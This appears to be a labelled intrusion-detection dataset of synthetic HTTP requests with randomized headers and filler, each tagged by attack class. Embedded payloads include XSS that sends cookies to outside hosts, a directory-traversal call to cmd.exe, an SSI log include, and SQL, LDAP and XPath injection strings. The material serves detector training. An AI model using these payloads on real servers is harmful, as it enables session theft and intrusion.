GET /fWU7768Wsam/mPwLZ/kmhOd9oNodrs0m/stsAu7rwaOencsam/se_V14k8TyOCPLKZ9/enseiRebeaa/BvhtpassiAqgfw@UR/thnNNodSrtewI.htm?lEu4il7esoeton=07&oeehttts=0rc%29%28%7C++%28nt%3D*%29&esZrthwo=82553214&zPJ3nodeOHPj1=715&iehtwesAd4uif=Vwheresr&BKXGLPq=pr&oStlohznsD=Tidarleoije4&G.jRscriptH120=jdN.LYw0sb0&psetOintYeo7ohn=%3Cgs&C6td=riio&vknO=at+rat+sp&udsddsekHejbid=boot.inite%3B+rScaa&eziwtNrm=rU2s&an=h46F642qsg&xhu3leie=893533110 HTTP/1.1
Host: 163.207.0.156
Connection: keep-alive
Accept: image/gif
Accept-Charset: *
Accept-Encoding: *;q=0.0
Accept-Language: tl1hMde-2pxs;q=0.0, jmmEA-qoaOeia;q=0.4
Cache-Control: max-stale=0225
Client-ip: 126.43.137.208
Cookie: enrentgr=89;e0rt3ayh=9n;eoynnsheeuer=ned9qlArsl
Cookie2: $Version="458"
Date: Thu, 20 Mar 08 16:09:55 GMT
ETag: "eg_Owd@DHvhvOHK"
Expect: etCdhnon
From: lettnc@jm5ef.cz
If-Modified-Since: Fri, 13 Aug 04 09:31:29 GMT
If-Unmodified-Since: Sat, 13 Jan 07 05:04:28 CET
If-Match: *
If-None-Match: *
If-Range: "PYr5O0unHSO.RNNxepl"
Max-Forwards: 21
MIME-Version: 0.6
Pragma: mh='ttlrewi'
Proxy-Authorization: Basic bGlXaXJmYTpTcmFl
Authorization: NTLM ZWVob0VsaHJlQ3JydGVhdW9hbXJpZWlzdHR1OWVzZWFvaW9jZWVlcmNlZmRvbm4=
Range: 0-190754,-136
Referer: http://www.9mtni.ch/bvl5/xentae/fTtmgel/mhdd1t4.mp3
TE: trailers
Trailer: Accept-Encoding
User-Agent: ejsf/4.6.2.0
UA-CPU: 68000
UA-Disp: 854,896,8
UA-OS: Win95
UA-Color: color8
UA-Pixels: 896x746
Via: HTTP/6.0 www.nctttu.html
Transfer-Encoding: gzip
Upgrade: Mso/2.1, 5stNn/1.9, etusna/2.9, fettee/0.9, 7agirn/3.3
Warning: 566 www.yfryp.tiff "ewpadovcn" 
X-Forwarded-For: 176.194.226.79
X-Serial-Number: 9579642646846
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38350
Start - Id: 35897
class: XPathInjection
PUT /mfPLJ/maIw/uu6Iwindow.openyg/hitwniqlswadetn/mo8YqpAZ9TA/oVoT15_pxv/dohao0eAansf/i0Se1Eeteade3Itntns/bMucdNop8elolanhaaa/yp2APpokQVp-v.F_m/tbaDN/sxk9cFYl7.l.shtml? HTTP/1.1
Content-Length: 21
Content-Language: 6y,e,Dhh6snyn
Content-Encoding: deflate
Content-Location: /eds4/i9dikuia/elTemem.js
Content-MD5: b2F2c2lod25yaWpvZmh0YQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 13 Jun 04 15:57:42 UTC
Last-Modified: Sun, 06 Sep 09 07:58:55 CET
Host: www.thpruFauDd.it:5127
Connection: ctaule
Accept: */*
Accept-Charset: windows-1254;q=0.2, iso-8859-3;q=0.4
Accept-Encoding: *;q=0.1
Accept-Language: (i <  count(ie/child::text())   and    j  < count(dso/child::comment())  and    k    <     count(4onrt/child::*) )
Cache-Control: no-cache
Cookie2: $Version="1"
Date: Sun, 20 Jun 04 15:02:23 UTC
If-Modified-Since: Tue, 28 Oct 08 21:35:15 UTC
If-Match: *
If-None-Match: "IGLZuYRpTBZMhMTc"
Max-Forwards: 4
Referer: http://teiw2.org/w9mL/Eoltri/rdse/nhnh2n.cgi
User-Agent: Mozilla/2.9 (Machintosh; U; PPC Mac OS X 9.9; wi-ds; rv:3.1.2) Gecko/38970242
Via: 0.3 56.118.107.78, HTTP/4.7 158.167.37.253
Transfer-Encoding: gzip

1nRt00dpwhnnr=ndn 7ss

End - Id: 35897
Start - Id: 50004
class: XPathInjection
PUT /mams/Perri/e2toarulhs1ubs/23liifrtaodsha5wnl/7SGfTPAn5oXedjE.tiff? HTTP/1.0
Content-Length: 161
Content-Language: oed21w
Content-Encoding: gzip
Content-Location: /t2sh/neheou/3tth.avi
Content-MD5: d3RldGVlYXRqZXIwZ2FheQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 08 Jan 05 10:50:29 GMT
Last-Modified: Thu, 25 May 06 06:53:32 CET
Host: www.uel1t1p11n.de
Connection: keep-alive
Accept: audio/basic, application/*
Accept-Charset: x-mac-hebrew
Accept-Encoding: deflate;q=0.0
Accept-Language: ouxtst/puWA/bcZ661/child::node()[ position()=51]    |   h/a/awd/child::text()[position()=1]    or   '8ehri'    = '
Cache-Control: no-cache
Client-ip: 177.9.17.154
Cookie: 2eupdate0aj=23987;yoClei4R=iwitt4l2tcth9fiicstdino ;et=d
Cookie2: $Version="507"
Date: Sat, 10 Sep 05 20:46:42 GMT
ETag: W/"jbIEjL@CfYE2fgf1V"
Expect: SEeuet
From: etjd@onalE.be
If-Modified-Since: Sat, 13 Sep 08 20:10:55 GMT
If-Unmodified-Since: Sun, 17 Dec 06 22:06:44 CET
If-Match: "X_JEa3J6PrqCTWOqUg"
If-None-Match: *
If-Range: Mon, 09 Jun 08 14:22:46 CET
Max-Forwards: 37
MIME-Version: 1.4
Pragma: no-cache
Proxy-Authorization: Basic YUJ1YTpBaXBlaQ==
Authorization: qetsi haat5=cptst
Range: 1-0902
Referer: http://www.utZr.org/1imtlff/b1dirrg/tdsb/atc4D8c.mpg
TE: deflate
Trailer: Date
User-Agent: Mozilla/8.7 (compatible; Konqueror/8.4; Mac OS X; mqer; crslyr; taruEudyTe)
UA-CPU: x86
UA-Disp: 5539,6840,32
UA-OS: Win98
UA-Pixels: 957x1532
Via: FTP/4.2 www.NHwe.png
Transfer-Encoding: identity
Upgrade: ihrzto/2.6, omrie/3.9, eairtL/8.4, nh9aUe/7.3, nbnau7/0.7
Warning: 930 www.EosRdrh.tiff "etleodlp" 
X-Serial-Number: 1430325
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

huataiHprl=rAifOU&tsT2en2Hb=eEperlncbgsoundzPrmietegmail%h&leehtknsB=pz9k&Zk31Axrt=dX-RXb0@&nydh=xmoriT&xYtelnetZhavingvKC2=997941&Slsneutra=945&otEoodwues=R

End - Id: 50004
Start - Id: 35931
class: PathTransversal
GET /nZ9So4tmia/eriWqerhtur/tvrnlobe6/1nopu0l.asmx?rbwshRein=uS%29+te+9suRNupdate&o4=3114148&e72geexetxasrep=64050&SsEDeonnAo=poaTe9nblib&adtderhatnae=91555837&avewr9aost=%3C%21--%23include+++++virtual%3D%22%2Fvar%2Flog%2Fhttpd%2Faccess.log%22--%3E&Mtppztls=n&ohacNiEsga=emty&nty=990&eil7rlekwlhOt77=Eunqunionwena3insertecwi HTTP/1.1
Host: www.ni2btn.fr:80
Connection: hmazoitn
Accept: image/*
Accept-Charset: x-mac-ce, windows-1251
Accept-Encoding: compress;q=0.1, deflate;q=0.0, compress;q=0.5, deflate;q=0.4, identity;q=0.2
Accept-Language: a13OA-6uaift;q=0.7, beuo8ru-7i, tpr-nS, 3-e, ohdTe-xy
Cache-Control: no-cache
Date: Thu, 18 Oct 07 16:13:09 UTC
ETag: W/"YdL@MxnUcp1wtpf"
From: guNijtrt@taipn3.org
If-Unmodified-Since: Thu, 17 May 07 10:00:48 UTC
If-None-Match: "QfV_C6D-e6qPtWXgp"
If-Range: *
Max-Forwards: 7
Pragma: jal=onLiyqoc
Proxy-Authorization: Digest cnonce="ei6idr"
Authorization: Basic c2NnbHlnZWU6Mjcxb3E1bDE=
Range: 2-,-884
Referer: /eSt5/uape/oyadf/tr9du.pl
TE: gzip;q=0.6,chunked;q=0.2,gzip
User-Agent: etemc93rct/2.0
Via: 8.7 25.222.64.103

null

End - Id: 35931
Start - Id: 35528
class: XPathInjection
POST /xQl/4Wuaccept/ht2ZLe84W21Gdta.nsf? HTTP/1.0
Content-Length: 156
Content-Language: erc7nRhe,bma,NoS
Content-Encoding: compress
Content-Location: /ontAaNm/bewo/s3qlc/ttge.php4
Content-MD5: ZWFzZW41ZTdkUmlpZXNuYw==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 05 Nov 06 16:34:15 CET
Last-Modified: Thu, 04 Jun 09 23:59:19 UTC
Host: 4.131.45.197
Connection: close
Accept: image/*;q=0.8
Accept-Charset: euc-jp
Accept-Encoding: compress, compress, gzip;q=0.2, deflate, deflate
Accept-Language: e-iohitnn;q=0.4, 4hiema-eEfy;q=0.2, etoemrt-3sn;q=0.1
Cache-Control: Ygetrie2=0
Client-ip: 106.66.65.58
Cookie: LUboot.iniaOEVy=24472;168sqtrrtolps=erR
Cookie2: $Version="891"
Date: Sat, 04 Feb 06 23:56:25 GMT
ETag: "pjVM2@qz7S7-tpwC"
Expect: Zgse=teneo;otninw=mnsa
From: ddsory@ail3hIue.st
If-Modified-Since: Sun, 09 Jul 06 11:55:54 CET
If-Unmodified-Since: Sun, 25 Apr 04 03:52:41 CET
If-Match: *
If-None-Match: "KEvsj_Yu0hTdM9t"
If-Range: *
Max-Forwards: 4288
MIME-Version: 8.9
Pragma: ena='amtet'
Authorization: Basic dnVhN3M6bnByMmE=
Referer: http://www.dtSmssn.org/ubtr.txt
TE: trailers
Trailer: Max-Forwards
User-Agent: Mozilla/8.0 (Windows; U; Windows NT 0.1; mt-nh; rv:4.8.5) Gecko/14752920
UA-Disp: 740,794,8
Via: HTTP/2.0 40.243.44.154, 6.4 www.tnxyl.shtml
Transfer-Encoding: deflate
Upgrade: hs1gw/0.3, rdt/3.0
Warning: 729 81.169.14.55 "k7tiinwireni" "Mon, 24 Dec 07 19:28:46 GMT"
X-Forwarded-For: 182.111.185.137
----: ---------------------------------

itiaont3a=s'foeEyIeIq&ouego=<cbdL&entiBh=6890   or     dios0e/T4h/fram/child::node()[position()=91]    or    19=&lsY1kQimhNN=1

End - Id: 35528
Start - Id: 47124
class: XSS
GET /JD/4@-_k/QpsC1SF@hG6ownBB/cice/i@x3YHIzCIXT@.mdb?Eyjqe8tsncey=n%3Deta&ibSakinh=65&biy6D=mm2.x&lq3uheir=khqe+mtformso3S&beds=%3Cimg+src++++%3D++++%22++++javascript%3A+++%5Bdocument.location.replace++++%28%27http%3A%2F%2Fwww.mare.com%2Fcgi-bin%2Fal.cgi%27%2Bdocument.cookie%29%3B%5D%22%3E&twltede=escqmsnry&EdhOdLnele=mte&0rL=rdLSX&lie=i%40A6aXs&ohejar=betweendft5oascr%3Ddn%25i HTTP/1.1
Host: 6.230.216.51:80
Connection: keep-alive
Accept: text/plain, text/*;q=0.6, image/gif;q=0.6
Accept-Charset: x-mac-cyrillic;q=0.7
Accept-Encoding: 
Accept-Language: y27cd5-Sadrth, yeshcdan-s7i35
Cache-Control: max-age=6
Client-ip: 111.27.185.154
Cookie: LIhQJp3ZMYlW=3d
Cookie2: $Version="5"
Date: Sat, 20 Aug 05 17:53:49 CET
ETag: "mQNu2WqrXNJIUGh7"
Expect: sra9A=H3ma;sioief8
From: dy0mird@eelb.it
If-Modified-Since: Fri, 17 Nov 06 02:08:31 UTC
If-Unmodified-Since: Mon, 21 Aug 06 01:21:22 CET
If-Match: "qqyGfsx.zGKl71-SzEs9"
If-None-Match: *
If-Range: "pkvVXtr2O-4U7WTH"
Max-Forwards: 83
MIME-Version: 5.8
Pragma: ghnp2d='dau'
Proxy-Authorization: Digest qop=auth
Authorization: NTLM YjIwNXlqc3JsYWFobm5mdHVuaWFlYUx0eXluaWR6bXd3MXNuek5oc2Noc2g=
Range: 38-13,-4
Referer: http://www.cum5.uk/ciie8/nu98o17/rSmSi/rciwteek/qsmo.aspx
TE: deflate
Trailer: Authorization
User-Agent: Mozilla/7.1 (compatible; Konqueror/0.4; Linux i386; mohmle; m3mkle)
UA-CPU: 68000
UA-Disp: 016,6175,32
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 7372x166
Via: 3.4 121.10.1.78, fncc/4.0 56.96.91.18:704, FTP/7.3 86.72.132.212
Transfer-Encoding: compress
Upgrade: suae0/1.2
Warning: 236 www.awsdo.css "gdocuisscirL" "Fri, 28 Dec 07 18:21:26 UTC"
X-Forwarded-For: 32.49.185.177
X-Serial-Number: 42655
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 47124
Start - Id: 43969
class: OsCommanding
GET /images/.%2e/.%2e/.%2e/.%2e/winnt/system32/cmd.exe?/c+dir HTTP/1.1
Host: 93.192.170.23
Connection: keep-alive
Accept: text/xml;q=0.5
Accept-Charset: *;q=0.1
Accept-Encoding: gzip;q=0.7, deflate;q=0.4
Accept-Language: *
Cache-Control: max-age=5073
Client-ip: 25.103.27.234
Cookie: 5f6IlAr=3;t1kAXZiZKgroup byKS=positionnhtacces8Rsrf;hRiozUa=eaa8
Cookie2: $Version="45"
Date: Mon, 15 Feb 10 03:42:26 UTC
ETag: "d0_qiYUs1JJWIAlbJB6"
Expect: Teocbl
From: axenii@lMdner.de
If-Modified-Since: Sat, 20 May 06 19:30:11 CET
If-Unmodified-Since: Fri, 20 Feb 04 04:23:12 UTC
If-Match: "-p2rLxjVRyesjAFX.Q"
If-None-Match: "KMHS8YxyT_r580wyI_X"
If-Range: Fri, 04 Mar 05 16:36:47 UTC
Max-Forwards: 0
MIME-Version: 7.7
Pragma: no-cache
Proxy-Authorization: Digest nc=E191EEa9
Authorization: Digest response="bCb71bf84af70Cd0eF014Adf964Ab7FA"
Range: 2873-08
Referer: /lfffuSt/anr5t/citE8t/ioi5.swf
TE: deflate;q=0.4,trailers
Trailer: Referer
User-Agent: Mozilla/7.9 (X11; U; SunOS sun4u 8.8; ft-Rc; rv:2.4.9) Gecko/84632047
UA-CPU: 68000
UA-Disp: 7638,7203,8
UA-OS: Win95
UA-Color: color32
UA-Pixels: 2346x026
Via: HTTP/8.2 www.qho7.html, teni/5.9 www.wge4E.jpeg
Transfer-Encoding: compress
Upgrade: pAn/5.4, eynSnm/6.6
Warning: 185 www.ayfae.tiff:7 "h2dyo3oifn2sa9H7" 
X-Forwarded-For: 67.28.144.149
X-Serial-Number: 552046622508653273
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 43969
Start - Id: 37670
class: LdapInjection
POST /mdxpop/j5oreurndB3xestoOhi/8Mb/oiAhgt/5NglG/oret3inlla2h/6@c/onievgeo/eUqV2.exe? HTTP/1.1
Content-Length: 247
Content-Language: e,ctte
Content-Encoding: deflate
Content-Location: http://oyattka.biz/al4io1/n0y4s20.ace
Content-MD5: YXRuZWV2Y2RjckFhdmkweQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 03 Mar 07 04:17:17 UTC
Last-Modified: Sat, 03 Feb 07 08:15:25 UTC
Host: 77.104.115.253
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: a-eti, OWtcpN-aogvosps;q=0.6, Ni-osmt
Cache-Control: ridr=1cmty
Client-ip: 234.96.170.169
Cookie: oeiiodmql=jlbKZfPXZNM;RnwwffounngddOh=ieotytslls&tmlike4q ;a3NcA3h=ebOLn
Cookie2: $Version="613"
Date: Tue, 15 Dec 09 19:05:47 GMT
ETag: "L1wKH0qc0h5OgNanY"
Expect: 100-continue
From: eavrng@Ual9isu.biz
If-Modified-Since: Sun, 09 Jan 05 05:01:11 CET
If-Unmodified-Since: Mon, 27 Jun 05 01:34:51 GMT
If-Match: "fdP.5sI.R-AUru88"
If-None-Match: *
If-Range: "aoxBql@E9lHinQIapHON"
Max-Forwards: 1
MIME-Version: 9.4
Pragma: lNRta='ets8I39a'
Proxy-Authorization: Digest uri=/heen1roq/eredadu/eloyue/dceeE.cgi
Authorization: Digest opaque="Lrea"
Range: 7-75,773-,28-851
Referer: http://www.2aaese.fr/anann8ii.swf
TE: trailers
Trailer: Authorization
User-Agent: Mozilla/9.3 (Machintosh; U; Mac OS X 1.8; rt-es; rv:7.2.9) Gecko/87966261
UA-CPU: StrongARM
UA-Disp: 770,856,16
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 940x1719
Via: 2.1 2.34.100.72, HTTP/1.0 206.92.198.88, HTTP/0.9 22.236.122.79
Transfer-Encoding: deflate
Upgrade: pemoEi/4.0
Warning: 026 155.240.111.33 "facqeennibgrcecdveu" "Wed, 19 Jul 06 04:22:04 GMT"
X-Forwarded-For: 193.224.2.50
X-Serial-Number: 7386288464563322200
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

nthm5mNa=1b8s&log8Xhk6BTJLq=3181&hsE5ccq=tivoh+window.open&NgemamcoTohsotE=lb70EZasid&drqt=fDQyrRn&9r=rtej2oyieatUe&XdropLZNbmail=f3aam)(&(objectClass  =   mie*)&ilHicerBBewksG=8181612012&Mr3a1uesySdT4= hhwyShoSssa8rh&fr7oesow=765205

End - Id: 37670
Start - Id: 47845
class: XSS
GET /ousDYfTXrifCNdr-xKC/ibNe8Tv3Jds/yCnt2hhWhrOaaPgsl6g/ee1MR_LdKgFJd_Dv0/vXd5020K_73Z.js?he=7440&T@01nhezjph=6.6b6yVo.6lC&lYeJFintheeEi=%28%7EHevala&nciD=b61EmJTy-6F2&yfunI2to=sTrU45&8nqtssnlReu5nn=uiAa&ed5hndh2Mhea=742095&rte=f%3Dct&rdy9i=t1Jqrt8&lodMi6aold=%3Cstyle%3E%3C%21--%3C%2Fstyle%3E%3Cscript++++%3E%5Bwindow.open%28%27http%3A%2F%2F66.215.203.245%2Fntel.php3%27%2Bdocument.cookie%29%3B%5D%2F%2F--%3E%3C%2Fscript+++%3E&ap5tlt5nj4neio=e%3En HTTP/1.0
Host: www.8apEO.st
Connection: close
Accept: image/*;q=0.7
Accept-Charset: x-mac-arabic
Accept-Encoding: 
Accept-Language: p-anne5Q;q=0.0, hadtd-Ieiegoee;q=0.1, szsioHl-nreNPtnl;q=0.3, nndjaie-mrn;q=0.2
Cache-Control: no-transform
Client-ip: 254.18.42.23
Cookie: gTeoepa=e9eje esuy2sL;v9NTE4=aXe5Y1hy;dIeej=070869
Cookie2: $Version="459"
Date: Thu, 17 Jan 08 01:55:19 CET
ETag: "c4Wi6no_@51d.A@3Mpf"
Expect: 100-continue
From: rntaoh@dim7.fr
If-Modified-Since: Wed, 26 Dec 07 03:45:09 UTC
If-Unmodified-Since: Mon, 29 Aug 05 15:53:09 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 70
MIME-Version: 4.6
Pragma: no-cache
Proxy-Authorization: Basic ZWhOM3V1eDplckx0bnM=
Authorization: Basic Z2JzbmQ6ZW51cjEw
Range: 035-1,0779-,77-
Referer: /jaad/ew3e/iidea.mpeg
TE: trailers,trailers,trailers
Trailer: Pragma
User-Agent: Mozilla/0.8 (compatible; G3sd; SunOS sun4u; oa8jlo; EehuN)
UA-Disp: 4309,162,32
Via: tmfsf/7.6 www.Onitn.tiff
Transfer-Encoding: identity
Upgrade: Xtfkh/8.2, Oni/6.3, dia/4.0, rase/7.9
Warning: 626 136.170.222.193 "qysfxete3o" "Wed, 05 Sep 07 23:11:56 UTC"
X-Forwarded-For: 98.250.156.118
X-Serial-Number: 42043067553619454717
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47845
Start - Id: 48751
class: XPathInjection
GET /3sesalqeaAaraaUoeyi/so/aux/nLtzmt/oss7eerp3eeah7/stdin-H4Pdf-BcY9b/01dandA9flMctmpdocument8gN/1It9Hl.DgA@Som.asp?agoc=woinxi%27+++++or+R0tcie%2Foow%2Fchild%3A%3Anode%28%29%5Bprocessing-instruction%28%29%3D884%5D+++++or+++%27entso%27++++%3D+++%27&UwW3Rpxwindow.openU=elrttL&IEg7=oTeyoe%25e+7&1tgiipnut=dwiz&zce5Ne=60264&oaaoet6Oj=hiietmajtsrejt5gMh&9CthlVosistrie=s&aluanA7o=8&8HpjMy=p2fmlmtk+%5D%2Bn HTTP/1.1
Host: www.aonehh4i.gov:5197
Connection: eeya
Accept: */*;q=0.0
Accept-Charset: x-mac-icelandic;q=0.9, x-mac-chinesesimp, isiri-3342;q=0.6
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-transform
Client-ip: 198.165.200.109
Cookie: 3YOhupdatesqarLZ=ee texrlSOoHvd;trGr0stdp=eid1
Cookie2: $Version="094"
Date: Tue, 09 Dec 08 19:04:56 CET
ETag: "ziszZk3WBXeiUD9SNJp"
Expect: 100-continue
From: 2thchRa@mEq7atat.cz
If-Modified-Since: Mon, 17 Jul 06 04:05:22 GMT
If-Unmodified-Since: Thu, 14 Dec 06 11:25:06 UTC
If-Match: "Hyiqgn3PGzTYdNnBFh"
If-None-Match: *
If-Range: Thu, 29 Jan 04 16:38:25 UTC
Max-Forwards: 0
MIME-Version: 7.9
Pragma: no-cache
Proxy-Authorization: Basic TWlpaTozZXdF
Authorization: NTLM dG1sZW1lZUFwdTlpaWlFcnJkYWV6d256ZWVuandpaHNMZW9nbG9lZWhjZG5ybg==
Range: -506333,18704-151605
Referer: /aeriBmwm/tenagll/oh0ni.gif
TE: gzip,gzip;q=0.7,chunked
Trailer: If-Range
User-Agent: Mozilla/2.8 (Windows; U; WinNT 3.5; in-Hj; rv:6.1.9) Gecko/03947786
UA-CPU: MIPS
UA-Disp: 132,229,32
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 0470x877
Via: ntl/9.4 www.4T1g3erb.htm, FTP/0.0 www.tiRJcs.jpg
Transfer-Encoding: compress
Upgrade: asd/1.5, Ttn35k/8.5
Warning: 303 90.249.48.25 "nehmlsj3aoo" 
X-Forwarded-For: 55.147.33.124
X-Serial-Number: 265535777881770929
----: ------------
~~~~~: ~~~~~~~~~~

null

End - Id: 48751
Start - Id: 41670
class: SqlInjection
GET /t5_Im777B8JJ3l@h/wREah7iT/o.-gB/sZY_MEnw/cVhaQEPgHEm3/tvees0puhnmHn/Cgq/aqBFJK-bPf3bvrE2lVV/eRBNKTO75kaAsh/DtszvcrLTlx/tQas.bin?oeh=rn&klikeVhUAt33GC_=iN8C49&ol=-3neus&zenrt7=3362985&lmtwEtrelrehI=OR++++965%3D965 HTTP/1.1
Host: 132.159.196.116
Connection: ierwte
Accept: */*;q=0.3
Accept-Charset: big5;q=0.0, ks_c_5601-1987, x-mac-arabic;q=0.8
Accept-Encoding: gzip
Accept-Language: rI-lrel;q=0.9, tihspuo-j62hsue;q=0.9, etqemi-f8;q=0.6
Cache-Control: max-age=3897
Client-ip: 5.33.223.172
Cookie: hptS3hHrao=hlthaccess_logEulandm;dlaneritanped=3068105;ahntl=4I4DVC;p9l4hAv=165;PacI=1970
Cookie2: $Version="5"
Date: Fri, 02 May 08 13:12:19 CET
ETag: "9etS4jTU1lIUOtjyf_"
Expect: 7huauig
From: maohii@yrratfrp.uk
If-Modified-Since: Fri, 11 Jun 04 13:21:13 GMT
If-Unmodified-Since: Mon, 23 Nov 09 09:06:15 GMT
If-Match: *
If-None-Match: "iq7M18atiEy_-Mx"
If-Range: "_GAzh@j7to8Lv3f9"
Max-Forwards: 4
MIME-Version: 1.5
Pragma: rlitR9S=noasnay
Proxy-Authorization: daahrP decdjt5=wri6iree
Authorization: Basic bnhpRWM6bnNhcnNzbA==
Range: -91,787-299778
Referer: /wkdMy/sost/imElene/0eugp.jpg
TE: deflate,trailers,trailers
Trailer: Host
User-Agent: Mozilla/1.8 (Machintosh; U; Mac OS X 6.4; at-wm; rv:5.3.3) Gecko/02969297
UA-CPU: MIPS
UA-Disp: 2834,2406,8
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 232x3893
Via: FTP/1.7 35.198.25.46, FTP/4.6 www.pdicdn.html:9
Transfer-Encoding: identity
Upgrade: Exe2/5.7, all/8.8, cei1I/8.8, syzked/1.5
Warning: 530 32.109.118.103 "hOGeuun3sa018i" 
X-Forwarded-For: 46.66.131.26
X-Serial-Number: 611965021882313
----: --------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 41670
Start - Id: 36997
class: LdapInjection
GET /79i2B/nttslI/Tgw0r/nmycuJzF/ddEDynyN2geZkDl2BhUU/weuhiedwveg/ehHt5ettaasht.jpg?aa=%29+%28+++%7C+%28displayName%3Dhad*%29+%28name%3D++had*%29%28+mail%3Dhad*++%29&Nqen=formttllyformh HTTP/1.0
Host: www.0snnpenq.gov
Connection: iySttre6
Accept: video/*
Accept-Charset: iso-8859-1, isiri-3342
Accept-Encoding: gzip;q=0.6, identity
Accept-Language: raa9Adup-soat;q=0.3
Cache-Control: no-cache
Client-ip: 9.220.179.73
Cookie: eviYuylr5=054236;omiiee9dvn=sCxe
Cookie2: $Version="216"
Date: Tue, 23 Feb 10 06:13:37 GMT
ETag: "B8E.sqhQTxd1WRrRZqJv"
Expect: 100-continue
From: nlnE@rejed1gea.uk
If-Modified-Since: Mon, 20 Mar 06 18:38:33 GMT
If-Unmodified-Since: Sat, 16 Apr 05 19:27:18 GMT
If-Match: "S2hjA@sUQgAy6L2G"
If-None-Match: "ZKH_-y9Yd-._F82"
If-Range: *
Max-Forwards: 502
MIME-Version: 5.8
Pragma: 94o8dm='fn'
Proxy-Authorization: Basic YXRwaTowSWV5OGxj
Authorization: poavs iisB=ssstefcd
Range: 11-,-9658
Referer: http://2e7moN.com/iInN.mdb
TE: trailers,chunked
Trailer: User-Agent
User-Agent: Mozilla/5.1 (Windows; U; Windows NT 7.1; mh-ta; rv:8.4.8) Gecko/81035554
UA-CPU: PowerPC
UA-Disp: 2667,8228,8
UA-Color: color8
UA-Pixels: 391x727
Via: loi/9.3 135.61.31.29, 3.4 www.cSreauo3.png, 8.1 www.eehoDnoi.tiff
Transfer-Encoding: deflate
Upgrade: roet/7.5, Xeuonr/9.7, oeer/4.8, opcsoe/4.8
Warning: 135 249.137.139.161 "EeTeptifzxaoiar" "Fri, 26 Jun 09 16:27:58 UTC"
X-Forwarded-For: 106.206.209.192
X-Serial-Number: 4092233930
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 36997
Start - Id: 42711
class: SqlInjection
POST /HSIS/rfvfGTn9LvyyBEesJR/slmrab/cLfdbhHGUb@f/azT75H/uS60eE3Y_@y.exe? HTTP/1.0
Content-Length: 55
Content-Language: se
Content-Encoding: gzip
Content-Location: http://nntu.com/bbnt/eLzn/thoi/lElcdodc.nsf
Content-MD5: b25Mb2FucnNrYWdlMHNpdQ==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 12 Sep 06 01:01:17 UTC
Last-Modified: Tue, 20 Dec 05 06:04:32 UTC
Host: 84.212.221.63
Connection: close
Accept: */*
Accept-Charset: gb2312, x-mac-chinesetrad;q=0.5, ks_c_5601-1987, windows-874, x-mac-icelandic
Accept-Encoding: compress, gzip;q=0.2
Accept-Language: *;q=0.2
Cache-Control: max-age=87
Client-ip: 34.238.18.93
Cookie: 1ues4fewodgpx=uHtlofoxsr;RLsdha=r0et;6pyuctoilay=d)so
Cookie2: $Version="69"
Date: Wed, 26 Mar 08 17:33:44 UTC
ETag: W/"O9kcnRqr.hXbx6V_il8"
Expect: ydtvhiN
From: leyen5sh@mOloiam5r.biz
If-Modified-Since: Mon, 21 May 07 18:31:47 CET
If-Unmodified-Since: Wed, 13 Jun 07 21:03:15 GMT
If-Match: *
If-None-Match: "Ucndbv_vfKhlIpNAphLM"
If-Range: Mon, 03 Dec 07 07:24:50 CET
Max-Forwards: 20
MIME-Version: 9.7
Pragma: otv='doiza'
Proxy-Authorization: Basic cjVuZDp4Z0ZlaHZoZg==
Authorization: n3ao ty3Tuoam=Esnnramo
Range: 30889-130,957-,45-484050
Referer: http://iltXw.uk/idnon3/At5tt2.dll
TE: deflate,trailers,trailers
Trailer: TE
User-Agent: '     or    id  in     (  select  *    from     user_db )
UA-Disp: 030,9561,32
UA-OS: Windows 98
UA-Color: color16
Via: 2.6 www.rDnBdoe.jpg, osHTyt/0.6 www.snjtOtQ.jpg
Transfer-Encoding: 5retfe; iyicdta=mahetiw
Upgrade: stwept/3.7, 3caoys/9.9
Warning: 096 162.11.120.83 "m8Bjnanad" "Wed, 04 Mar 09 18:39:09 GMT"
X-Forwarded-For: 18.244.48.193
X-Serial-Number: 0088484140288112965
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

d1sEeie4s8e8yj=ceMrEyXwIB2y&a6tewuerunkisz6=a>whereoe

End - Id: 42711
Start - Id: 39136
class: SSI
GET /6d/r8BPGI/htHuv7DX6/asDrbDofodcb.nsf?emuexntroao1s=smtelnet&eararyro=s1nihOCecaA&rotEgYb=76i&vot=tGrr&m34th=xumciestt%3E6%29ndi&snsteuia=bq%25lieloTo6esd%7Cb7st&hnfa1ets=5092507&ZOOjLwinnt_b_-=OtB8draonssbhE2sY&6hb=o5mh0dlmyt&lniucEdodtn=e3lHo&aaa8l=ye+l0seotyescripthmueni&3u=Ps%5Co1aL9&otrk7=02733 HTTP/1.1
Host: 40.217.114.106
Connection: a5aVa9
Accept: text/*;q=0.1, text/plain, video/*
Accept-Charset: iso-8859-6;q=0.2, iso-8859-3;q=0.9, windows-1253
Accept-Encoding: <!--#echo var="date_gmt"-->
Accept-Language: *
Cache-Control: max-age=4
Client-ip: 185.24.103.43
Cookie: ehIfi8Aao=asiTecw
Cookie2: $Version="5"
Date: Thu, 06 Oct 05 17:20:11 CET
ETag: W/"DRo586hwWsKMuM4ZMnE"
Expect: 100-continue
If-Modified-Since: Sat, 29 Jan 05 15:39:47 GMT
If-Unmodified-Since: Tue, 17 May 05 04:05:22 UTC
